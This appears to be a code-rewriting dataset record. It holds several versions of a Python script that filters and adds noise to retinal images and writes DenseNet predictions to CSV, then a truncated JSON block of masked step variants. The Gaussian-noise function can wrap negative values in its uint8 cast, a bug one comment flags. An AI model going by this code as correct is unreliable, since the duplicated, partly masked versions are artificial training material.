grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m, :] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
model_path = '/home/bo/Project/densenet.hdf5'
train_img_path = '/home/bo/Project/Eyes_data/first_train/'
test_img_path = '/home/bo/Project/Eyes_data/first_test/'
label_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',
error_bad_lines=False, index_col=0)
SIZE = 224
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m, :] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
x_train, y_train = set_data(train_img_path, label_df)
y_in = np.c_[y_train, np.ones(y_train.shape[0])]
x_test, y_test = set_data(test_img_path, label_df)
y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
X_ = np.r_[sobel(x_train), sobel(x_test)]
Y_ = np.r_[y_in, y_out]
ouput_csv(X_, Y_, 'sobel_eye.csv')
<|reserved_special_token_1|>
import random
import tqdm
from keras.models import load_model
from ModelUtil import precision, recall, f1
from tqdm import tqdm
import cv2 as cv
import numpy as np
import os
import pandas as pd
from PIL import Image
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
model_path = '/home/bo/Project/densenet.hdf5'
train_img_path = '/home/bo/Project/Eyes_data/first_train/'
test_img_path = '/home/bo/Project/Eyes_data/first_test/'
label_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',
error_bad_lines=False, index_col=0)
SIZE = 224
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m, :] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
x_train, y_train = set_data(train_img_path, label_df)
y_in = np.c_[y_train, np.ones(y_train.shape[0])]
x_test, y_test = set_data(test_img_path, label_df)
y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
X_ = np.r_[sobel(x_train), sobel(x_test)]
Y_ = np.r_[y_in, y_out]
ouput_csv(X_, Y_, 'sobel_eye.csv')
<|reserved_special_token_1|>
import random
import tqdm
from keras.models import load_model
from ModelUtil import precision, recall, f1
from tqdm import tqdm
import cv2 as cv
import numpy as np
import os
import pandas as pd
from PIL import Image
# Pin TensorFlow/Keras to GPU index 1 only.
os.environ['CUDA_VISIBLE_DEVICES']='1'
# Path of the trained model loaded by predict() and ouput_csv().
model_path = '/home/bo/Project/densenet.hdf5'
# Directories holding the training and test image files.
train_img_path = '/home/bo/Project/Eyes_data/first_train/'
test_img_path = '/home/bo/Project/Eyes_data/first_test/'
# Labels indexed by image id; has a 'level' column used by set_data().
# NOTE(review): `error_bad_lines` is deprecated in newer pandas (use
# `on_bad_lines='skip'`) — confirm the installed pandas version.
label_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv', error_bad_lines=False, index_col=0)
# Edge length (pixels) every image is resized to before modeling.
SIZE = 224
def preprocess_image(image_path, desired_size=SIZE):
    """Load one image from disk and resize it to a square.

    :param image_path: path of the image file to open
    :param desired_size: edge length (pixels) of the square result;
        defaults to the module-wide SIZE
    :return: the resized PIL image
    """
    image = Image.open(image_path)
    # LANCZOS resampling keeps quality high when shrinking.
    return image.resize((desired_size, desired_size), resample=Image.LANCZOS)
def set_data(img_path, dataframe):
    """Pair every image under *img_path* with its label from *dataframe*.

    :param img_path: directory (with trailing slash) containing the images
    :param dataframe: DataFrame indexed by image id with a 'level' column
    :return: tuple (uint8 image array of shape (N, SIZE, SIZE, 3),
        float label array of shape (N,))
    """
    file_names = os.listdir(img_path)
    count = len(file_names)
    images = np.empty((count, SIZE, SIZE, 3), dtype=np.uint8)
    labels = np.empty(count)
    names = np.empty(count, dtype=np.dtype(('U', 15)))
    for idx, fname in enumerate(tqdm(file_names)):
        images[idx] = preprocess_image(img_path + fname)
        # The image id is the file name without its extension.
        labels[idx] = dataframe.loc[fname.split('.')[0], 'level']
        names[idx] = fname
    return images, labels
def predict(X):
    """Run the saved Keras model on *X* and return its raw predictions.

    :param X: batch of preprocessed images
    :return: prediction array produced by the model
    """
    # The model was trained with custom metrics, so they must be supplied
    # again when deserializing it.
    custom = {'precision': precision, 'recall': recall, 'f1': f1}
    return load_model(model_path, custom_objects=custom).predict(X)
def sobel(img_set):
    """Apply a Sobel edge filter to every image in *img_set*.

    :param img_set: array of images, shape (N, H, W, C)
    :return: float array of the same shape holding the filtered images
    """
    out_set = np.empty(img_set.shape)
    for idx, frame in enumerate(tqdm(img_set)):
        frame32 = np.float32(frame)
        # Gradient magnitude along each axis, converted back to 8-bit.
        dx = cv.convertScaleAbs(cv.Sobel(frame32, cv.CV_32F, 1, 0))
        dy = cv.convertScaleAbs(cv.Sobel(frame32, cv.CV_32F, 0, 1))
        # Equal-weight blend of horizontal and vertical gradients.
        out_set[idx] = cv.addWeighted(dx, 0.5, dy, 0.5, 0)
    return out_set
def canny(img_set):
    """Mask every image in *img_set* so only Canny-detected edges remain.

    Fixes: ``cv.Canny`` requires an 8-bit single-channel input, but the
    blurred grayscale intermediate was float32 (GaussianBlur of a float32
    image stays float32), so Canny raised an error at runtime; the gray
    image is now converted to uint8 first. A leftover debug ``print`` of
    every masked image was also removed.

    :param img_set: array of uint8 RGB images, shape (N, H, W, 3)
    :return: float array of the same shape; non-edge pixels are zeroed
    """
    out_set = np.empty(img_set.shape)
    for idx, image in enumerate(tqdm(img_set)):
        blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
        gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
        # Canny only accepts 8-bit input; convert the float gray image.
        edges = cv.Canny(cv.convertScaleAbs(gray), 50, 150)
        # Keep the original pixels only where an edge was detected.
        out_set[idx] = cv.bitwise_and(image, image, mask=edges)
    return out_set
def scharr(img_set):
    """Apply a Scharr edge filter to every image in *img_set*.

    :param img_set: array of images, shape (N, H, W, C)
    :return: float array of the same shape holding the filtered images
    """
    out_set = np.empty(img_set.shape)
    for idx, frame in enumerate(tqdm(img_set)):
        frame32 = np.float32(frame)
        # Gradient magnitude along each axis, converted back to 8-bit.
        dx = cv.convertScaleAbs(cv.Scharr(frame32, cv.CV_32F, 1, 0))
        dy = cv.convertScaleAbs(cv.Scharr(frame32, cv.CV_32F, 0, 1))
        # Equal-weight blend of horizontal and vertical gradients.
        out_set[idx] = cv.addWeighted(dx, 0.5, dy, 0.5, 0)
    return out_set
def laplace(img_set):
    """Apply a Laplacian edge filter to every image in *img_set*.

    :param img_set: array of images, shape (N, H, W, C)
    :return: float array of the same shape holding the filtered images
    """
    out_set = np.empty(img_set.shape)
    for idx, frame in enumerate(tqdm(img_set)):
        response = cv.Laplacian(np.float32(frame), cv.CV_32F, ksize=3)
        out_set[idx] = cv.convertScaleAbs(response)
    return out_set
def sp_noise(img_set, prob=0.1):
    """
    Add salt-and-pepper noise to every image.

    Each pixel is independently forced to 0 (pepper) with probability
    ``prob``, to 255 (salt) with probability ``prob``, and kept unchanged
    otherwise; the choice applies to all channels of the pixel at once.

    :param img_set: array of images, shape (N, H, W, C)
    :param prob: per-pixel probability of each of pepper and salt
    :return: float array of the noisy images, same shape as input
    """
    ret = np.empty(img_set.shape)
    thres = 1 - prob
    for m, image in enumerate(tqdm(img_set)):
        # One random draw per pixel, broadcast across channels — replaces
        # the original per-pixel Python double loop with vectorized numpy.
        rdn = np.random.random(image.shape[:2])
        out = np.array(image, dtype=np.uint8, copy=True)
        out[rdn < prob] = 0
        out[rdn > thres] = 255
        ret[m, :] = out
    return ret
def gasuss_noise(img_set, mean=0, var=0.01):
    """
    Add Gaussian noise to every image in ``img_set``.

    :param img_set: array of images with values in 0-255
    :param mean: mean of the Gaussian noise
    :param var: variance of the noise (standard deviation is var ** 0.5)
    :return: float array of the noisy images, same shape as input
    """
    ret = np.empty(img_set.shape)
    for m, image in enumerate(tqdm(img_set)):
        # Work in [0, 1] floats so the noise variance is scale-independent.
        image = np.array(image/255, dtype=float)
        noise = np.random.normal(mean, var ** 0.5, image.shape)
        out = image + noise
        if out.min() < 0:
            low_clip = -1.
        else:
            low_clip = 0.
        # NOTE(review): when low_clip is -1., the uint8 cast below wraps
        # negative values around (e.g. -0.1 -> ~230) — confirm this is
        # intended rather than clipping at 0.
        out = np.clip(out, low_clip, 1.0)
        out = np.uint8(out*255)
        ret[m, :] = out
    return ret
def ouput_csv(X_, Y_, csv_path):
    """Predict on ``X_`` and write predictions plus the two label columns to a CSV."""
    metrics = {'precision': precision, 'recall': recall, 'f1': f1}
    net = load_model(model_path, custom_objects=metrics)
    frame = pd.DataFrame(net.predict(X_))
    frame['level'] = Y_[:, 0]
    frame['label'] = Y_[:, 1]
    print(frame)
    frame.to_csv(csv_path, index=False)
## Script entry: build the sobel-filtered dataset and dump predictions.
# Images from the train folder are tagged 1 ("in") and images from the
# test folder 0 ("out") in the second label column.
x_train, y_train = set_data(train_img_path,label_df)
y_in = np.c_[y_train, np.ones(y_train.shape[0])]
x_test, y_test = set_data(test_img_path,label_df)
y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
X_ = np.r_[sobel(x_train), sobel(x_test)]
Y_ = np.r_[y_in, y_out]
ouput_csv(X_, Y_, 'sobel_eye.csv')
## Alternative: original output without any edge operator.
# x_train, y_train = set_data(train_img_path,label_df)
# y_in = np.c_[y_train, np.ones(y_train.shape[0])]
# x_test, y_test = set_data(test_img_path,label_df)
# y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
#
# X_ = np.r_[x_train, x_test]
# Y_ = np.r_[y_in, y_out]
#
# ouput_csv(X_, Y_, 'sobel_eye.csv')
|
flexible
|
{
"blob_id": "c2b3594d25e2d1670d9b99e0d3484c680f59421f",
"index": 9465,
"step-1": "<mask token>\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = 
np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\n<mask token>\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = 
np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m, :] = out\n return ret\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nmodel_path = '/home/bo/Project/densenet.hdf5'\ntrain_img_path = '/home/bo/Project/Eyes_data/first_train/'\ntest_img_path = '/home/bo/Project/Eyes_data/first_test/'\nlabel_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',\n error_bad_lines=False, index_col=0)\nSIZE = 224\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image 
in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m, :] = out\n return ret\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, 
